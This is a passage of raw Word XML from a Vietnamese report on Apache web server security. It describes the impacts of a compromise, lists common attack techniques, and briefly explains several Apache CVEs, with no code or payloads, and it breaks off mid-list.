        <w:t>: Máy chủ có thể bị làm cho không thể hoạt động, gây gián đoạn dịch vụ cho tất cả người dùng hợp pháp và làm tổn hại uy tín của tổ chức quản lý máy chủ</w:t>
      </w:r>
      <w:r w:rsidR="00290F68">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F302358" w14:textId="61AC56AD" w:rsidR="00290F68" w:rsidRDefault="00E0644B" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Thay đổi giao diện (defacement)</w:t>
      </w:r>
      <w:r>
        <w:t>: Trang web có thể bị thay đổi giao diện, thường để lại các thông điệp hoặc hình ảnh không mong muốn của kẻ tấn công. Điều này không chỉ gây hại về mặt thẩm mỹ mà còn làm tổn hại đến hình ảnh của tổ chức.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5234A5AA" w14:textId="28771C51" w:rsidR="00E0644B" w:rsidRDefault="00AF6B0E" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Phát động các cuộc tấn công khác thông qua trang web bị xâm nhập</w:t>
      </w:r>
      <w:r>
        <w:t>: Máy chủ bị xâm nhập có thể trở thành bàn đạp để kẻ tấn công tiến hành các cuộc tấn công khác, bao gồm phát tán phần mềm độc hại, gửi thư rác, hoặc tham gia vào các cuộc tấn công DDoS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA2ECB5" w14:textId="39E68668" w:rsidR="00854AA1" w:rsidRDefault="00854AA1" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Truy cập các tài nguyên và đánh cắp dữ liệu</w:t>
      </w:r>
      <w:r>
        <w:t>: Kẻ tấn công có thể truy cập vào các tài nguyên của máy chủ như cơ sở dữ liệu, tập tin và ứng dụng, từ đó đánh cắp hoặc hủy hoại dữ liệu quan trọng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AC3AAE" w14:textId="62781BBB" w:rsidR="00854AA1" w:rsidRDefault="004E2D34" w:rsidP="00A91F6A">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Quản trị viên máy chủ phải liên tục cập nhật các biện pháp bảo mật và giám sát hoạt động của Apache để phát hiện sớm các dấu hiệu xâm nhập và xử lý kịp thời, nhằm bảo vệ dữ liệu và dịch vụ khỏi các mối đe dọa tiềm ẩn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26056184" w14:textId="77777777" w:rsidR="00E24EEF" w:rsidRPr="00E24EEF" w:rsidRDefault="00E24EEF" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc171085510"/>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="7CCDE56D" w14:textId="77777777" w:rsidR="00E24EEF" w:rsidRPr="00E24EEF" w:rsidRDefault="00E24EEF" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc171085511"/>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="2B8CC864" w14:textId="77777777" w:rsidR="00E24EEF" w:rsidRPr="00E24EEF" w:rsidRDefault="00E24EEF" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc171085512"/>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="6A317954" w14:textId="77777777" w:rsidR="00E24EEF" w:rsidRPr="00E24EEF" w:rsidRDefault="00E24EEF" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc171085513"/>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="68DD1D74" w14:textId="77777777" w:rsidR="00E24EEF" w:rsidRPr="00E24EEF" w:rsidRDefault="00E24EEF" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc171085514"/>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="299B5B5B" w14:textId="77777777" w:rsidR="00E24EEF" w:rsidRPr="00E24EEF" w:rsidRDefault="00E24EEF" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:before="200" w:after="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc171085515"/>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="6D8B53FE" w14:textId="65AD02F0" w:rsidR="00E24EEF" w:rsidRDefault="00B054A8" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:bookmarkStart w:id="61" w:name="_Toc171085516"/>
      <w:r>
        <w:t>Một số kĩ thuật</w:t>
      </w:r>
      <w:r w:rsidR="00E40F4A">
        <w:t xml:space="preserve"> tấn công Apache</w:t>
      </w:r>
      <w:r w:rsidR="004122F1">
        <w:t xml:space="preserve"> phổ biến</w:t>
      </w:r>
      <w:bookmarkEnd w:id="61"/>
    </w:p>
    <w:p w14:paraId="5C605CEA" w14:textId="65170678" w:rsidR="007A1EC5" w:rsidRDefault="0018519C" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DoS/DDoS </w:t>
      </w:r>
      <w:r w:rsidR="003C45B1">
        <w:t>Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAC6755" w14:textId="426B2C96" w:rsidR="0018519C" w:rsidRDefault="00FA5245" w:rsidP="00B361F7">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Các cuộc tấn công DoS/DDoS được sử dụng để gửi hàng loạt yêu cầu giả mạo đến máy chủ web, dẫn đến tình trạng máy chủ bị sập, không khả dụng hoặc từ chối dịch vụ đối với tất cả người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E64C5EC" w14:textId="2A42993B" w:rsidR="00FA5245" w:rsidRDefault="00D735D8" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t>DNS Server Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1007066D" w14:textId="38E84A62" w:rsidR="006611AF" w:rsidRDefault="00CE6AA5" w:rsidP="001D4FBF">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Bằng cách tấn công máy chủ DNS, kẻ tấn công có thể thay đổi cấu hình DNS. Sự thay đổi này có thể dẫn đến việc chuyển hướng các yêu cầu từ máy chủ web mục tiêu đến máy chủ độc hại do kẻ tấn công kiểm soát</w:t>
      </w:r>
      <w:r w:rsidR="00587F29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4C3345" w14:textId="09C04A8F" w:rsidR="004646EC" w:rsidRDefault="00524D0D" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t>Man-in-the-Middle</w:t>
      </w:r>
      <w:r w:rsidR="007C69B4">
        <w:t xml:space="preserve"> Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA73FF0" w14:textId="7D0A5CA7" w:rsidR="007C69B4" w:rsidRDefault="00F67DA2" w:rsidP="00E1625A">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Bằng cách sử dụng tấn công Man-in-the-Middle, kẻ tấn công đặt mình giữa máy khách và máy chủ để nghe trộm các gói tin, trích xuất thông tin nhạy cảm từ quá trình giao tiếp bằng cách chặn và thay đổi các gói tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38203B39" w14:textId="3B2E459F" w:rsidR="00F67DA2" w:rsidRDefault="007D2BB6" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t>Phishing Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299E2395" w14:textId="7CEAA4D5" w:rsidR="007D2BB6" w:rsidRDefault="00A82EBF" w:rsidP="00E1625A">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Bằng cách sử dụng tấn công phishing, kẻ tấn công cố gắng lấy cắp thông tin đăng nhập từ một trang web giả mạo trông giống như một trang web hợp pháp. Thông tin bị đánh cắp này, chủ yếu là thông tin xác thực, được kẻ tấn công sử dụng để giả mạo thành người dùng hợp pháp trên máy chủ mục tiêu thực sự.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5442A262" w14:textId="47BBCA79" w:rsidR="007D5A8D" w:rsidRDefault="00644369" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t>HTTP Response Splitting Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760EFAEF" w14:textId="440CAA9E" w:rsidR="00644369" w:rsidRPr="00644369" w:rsidRDefault="00C72587" w:rsidP="00E1625A">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00C72587">
        <w:t xml:space="preserve">HTTP Response Splitting tấn công kỹ thuật trong đó kẻ tấn công gửi yêu cầu tách </w:t>
      </w:r>
      <w:r w:rsidR="00ED68C5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C72587">
        <w:t>phản hồi đến máy chủ</w:t>
      </w:r>
      <w:r w:rsidR="009D2E6D">
        <w:t xml:space="preserve"> (chèn các ký tự điều khiển ví dụ như kí tự xuống dòng)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C72587">
        <w:t xml:space="preserve">. Bằng cách này, kẻ tấn công có thể thêm phản hồi tiêu đề, dẫn đến máy chủ sẽ chia phản hồi thành hai phản hồi. Phản </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">hồi </w:t>
      </w:r>
      <w:r w:rsidRPr="00C72587">
        <w:t>thứ hai nằm dưới sự kiểm soát của kẻ tấn công, vì vậy người dùng có thể được chuyển hướng đến trang web độc hại</w:t>
      </w:r>
      <w:r w:rsidR="00F43699">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BED0C4" w14:textId="27466FFA" w:rsidR="00A82EBF" w:rsidRDefault="002B309B" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Web Cache Poisoning </w:t>
      </w:r>
      <w:r w:rsidR="00390590">
        <w:t>Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F707D52" w14:textId="60FA57F5" w:rsidR="00235CFE" w:rsidRDefault="00235CFE" w:rsidP="00866311">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Là một kỹ thuật trong đó kẻ tấn công xoá bộ nhớ đệm thực tế của máy chủ web và lưu trữ các mục giả mạo bằng cách gửi một yêu cầu được tạo đặc biệt vào bộ nhớ đệm. Điều này sẽ chuyển hướng người dùng đến các trang web độc hại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7F8ACD" w14:textId="71A7ABC3" w:rsidR="00235CFE" w:rsidRDefault="006B1E42" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t>SSH Brute-force Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2372E3DD" w14:textId="1626654F" w:rsidR="006B1E42" w:rsidRDefault="000E3023" w:rsidP="00D0627E">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="006B1E42">
        <w:t>ột kỹ thuật trong đó kẻ tấn công cố gắng đoán mật khẩu SSH thông qua việc thử tất cả các kết hợp mật khẩu có thể. Bằng cách brute-force thông tin đăng nhập SSH, kẻ tấn công có thể có được quyền truy cập trái phép vào đường hầm SSH. Đường hầm mã hóa này được sử dụng để giao tiếp giữa các máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6655343F" w14:textId="54EF12C7" w:rsidR="006B1E42" w:rsidRDefault="00533B51" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:left="426" w:hanging="426"/>
      </w:pPr>
      <w:r>
        <w:t>Web Application Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130B62E7" w14:textId="67F518EF" w:rsidR="00533B51" w:rsidRDefault="0004586F" w:rsidP="00D0627E">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="0004586F">
        <w:t>Các cuộc tấn công liên quan đến ứng dụng web khác có thể bao gồm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D244E6" w14:textId="316D704F" w:rsidR="0004586F" w:rsidRDefault="0004586F" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="000E3023">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cookie Tampering:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00641E4F">
        <w:t>Là việc kẻ tấn công sửa đổi các giá trị cookie để giả mạo phiên người dùng hoặc đánh cắp thông tin</w:t>
      </w:r>
      <w:r w:rsidR="001701E7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4635A98F" w14:textId="336D4395" w:rsidR="001701E7" w:rsidRDefault="001701E7" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="000E3023">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL Injection:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B2AFD">
        <w:t>Kẻ tấn công chèn mã SQL độc hại vào yêu cầu để thực hiện các hành động không mong muốn trên cơ sở dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149AF3AC" w14:textId="2FDFAFEF" w:rsidR="007B2AFD" w:rsidRDefault="007B2AFD" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="000E3023">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Session Hijacking:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kẻ tấn công chiếm đoạt phiên làm việc của người dùng hợp pháp để truy cập trái phép.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B126B7" w14:textId="4051FD65" w:rsidR="007B2AFD" w:rsidRDefault="00061FAF" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="000E3023">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross-Site Request Forgery (CSRF) Attack:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0063467D">
        <w:t>Kẻ tấn công gửi yêu cầu giả mạo từ người dùng đến ứng dụng mà người dùng đã đăng nhập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F979CE" w14:textId="5A8A2F46" w:rsidR="0063467D" w:rsidRDefault="0063467D" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="000E3023">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS) Attack:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E3023">
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:t>ẻ tấn công chèn mã JavaScript độc hại vào trang web để thực thi mã này trên trình duyệt của người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644CC801" w14:textId="46FFB331" w:rsidR="0063467D" w:rsidRDefault="000E3023" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="000E3023">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Buffer Overflow:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kẻ tấn công gửi dữ liệu vượt quá khả năng xử lý của bộ đệm, gây lỗi và thực thi mã độc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DF2B7F" w14:textId="04E4B273" w:rsidR="00DA529D" w:rsidRDefault="001E7D0E" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc171085517"/>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="005B2590">
        <w:t xml:space="preserve">ỗ hổng </w:t>
      </w:r>
      <w:r w:rsidR="00D13A58">
        <w:t>trên Apache</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="438891AD" w14:textId="63068213" w:rsidR="00FA5245" w:rsidRDefault="001314CD" w:rsidP="00C56990">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Trải qua lịch sử phát triển của Apache</w:t>
      </w:r>
      <w:r w:rsidR="00634CC9">
        <w:t xml:space="preserve"> đã </w:t>
      </w:r>
      <w:r w:rsidR="002F1A26">
        <w:t>có rất nhiều lỗ hổng</w:t>
      </w:r>
      <w:r w:rsidR="0057020E">
        <w:t xml:space="preserve"> được tìm ra</w:t>
      </w:r>
      <w:r w:rsidR="003022F1">
        <w:t xml:space="preserve">, dưới đây là </w:t>
      </w:r>
      <w:r w:rsidR="00003D9B">
        <w:t>một số</w:t>
      </w:r>
      <w:r w:rsidR="003022F1">
        <w:t xml:space="preserve"> lỗ hổng</w:t>
      </w:r>
      <w:r w:rsidR="00003D9B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003022F1">
        <w:t xml:space="preserve">hay còn </w:t>
      </w:r>
      <w:r w:rsidR="000B3F4F">
        <w:t>được biết đến</w:t>
      </w:r>
      <w:r w:rsidR="003022F1">
        <w:t xml:space="preserve"> là CVE</w:t>
      </w:r>
      <w:r w:rsidR="001D50A2">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4036125E" w14:textId="1B1A6A80" w:rsidR="00BF3467" w:rsidRDefault="00634CD1" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF20F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2021-41773:</w:t>
      </w:r>
      <w:r w:rsidR="003770F4">
        <w:t xml:space="preserve"> là mã </w:t>
      </w:r>
      <w:r w:rsidR="00780F37">
        <w:t>định</w:t>
      </w:r>
      <w:r w:rsidR="003770F4">
        <w:t xml:space="preserve"> danh của</w:t>
      </w:r>
      <w:r w:rsidR="00505B9E">
        <w:t xml:space="preserve"> phiên bản </w:t>
      </w:r>
      <w:r w:rsidR="004F0D54" w:rsidRPr="004F0D54">
        <w:t>Apache HTTP Server 2.4.49</w:t>
      </w:r>
      <w:r w:rsidR="00E66B41">
        <w:t>, phiên bản</w:t>
      </w:r>
      <w:r w:rsidR="004F0D54" w:rsidRPr="004F0D54">
        <w:t xml:space="preserve"> dễ bị khai thác bởi các lỗ hỗng Path traversal và RCE (thực thi mã từ xa). Khai thác lỗ hỗng này cho phép tin tặc xem được bất kỳ tệp tin đang tồn tại trên server, từ đó thực thi trực tiếp các lệnh tùy ý thông qua thư viện /bin/sh. Mặc dù đã có bản vá nhưng giải pháp mà Apache đưa ra lại chưa xử lý chưa triệt để lỗ hổng và tin tặc vẫn sử dụng cách thức tương tự để bypass dễ dàng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2815A3" w14:textId="69396A0C" w:rsidR="004431A9" w:rsidRDefault="00731194" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA26B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2023-25690:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC13AF" w:rsidRPr="00AC13AF">
        <w:t>ảnh hưởng đến máy chủ Apache HTTP phiên bản 2.4.0 đến 2.4.55</w:t>
      </w:r>
      <w:r w:rsidR="00AC13AF">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E109FC" w:rsidRPr="00E109FC">
        <w:t>Đây là lỗi tận dụng một số cấu hình mod_proxy nhất định, dẫn đến khả năng xảy ra một cuộc tấn công HTTP request smuggling</w:t>
      </w:r>
      <w:r w:rsidR="008A66EB">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00533ADA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F5628" w:rsidRPr="000F5628">
        <w:t>Kẻ tấn công từ xa có thể khai thác lỗ hổng này để qua mặt các biện pháp kiểm soát truy cập trong máy chủ proxy, do đó ủy quyền các URL không mong muốn cho máy chủ gốc. Hơn nữa, điều này có thể dẫn đến nhiễm độc bộ nhớ đệm (cache poisoning) - một mối đe dọa nghiêm trọng đối với tính toàn vẹn của dữ liệu và bảo mật máy chủ</w:t>
      </w:r>
      <w:r w:rsidR="000F5628">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D6ECA2" w14:textId="309B609C" w:rsidR="009E4436" w:rsidRDefault="00C65E78" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC75C1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-2024-38474:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A74EDA" w:rsidRPr="00A74EDA">
        <w:t>là một lỗ hổng bảo mật trong Apache HTTP Server phiên bản 2.4.59 và các phiên bản trước đó.</w:t>
      </w:r>
      <w:r w:rsidR="0004005F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0004005F" w:rsidRPr="0004005F">
        <w:t>Vấn đề này liên quan đến mod_rewrite và</w:t>
      </w:r>
      <w:r w:rsidR="00EC4A8B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC4A8B" w:rsidRPr="00EC4A8B">
        <w:t>cho phép kẻ tấn công thực thi các tập lệnh trong các thư mục được cấu hình cho phép nhưng không thể truy cập trực tiếp bằng bất kỳ URL nào hoặc tiết lộ nguồn của các tập lệnh vốn chỉ được thực thi dưới dạng CGI</w:t>
      </w:r>
      <w:r w:rsidR="00FC75C1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531DDACD" w14:textId="71F81BD5" w:rsidR="00FC75C1" w:rsidRDefault="00C42CB2" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="005A505D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CVE-2022-28330:</w:t>
      </w:r>
      <w:r>
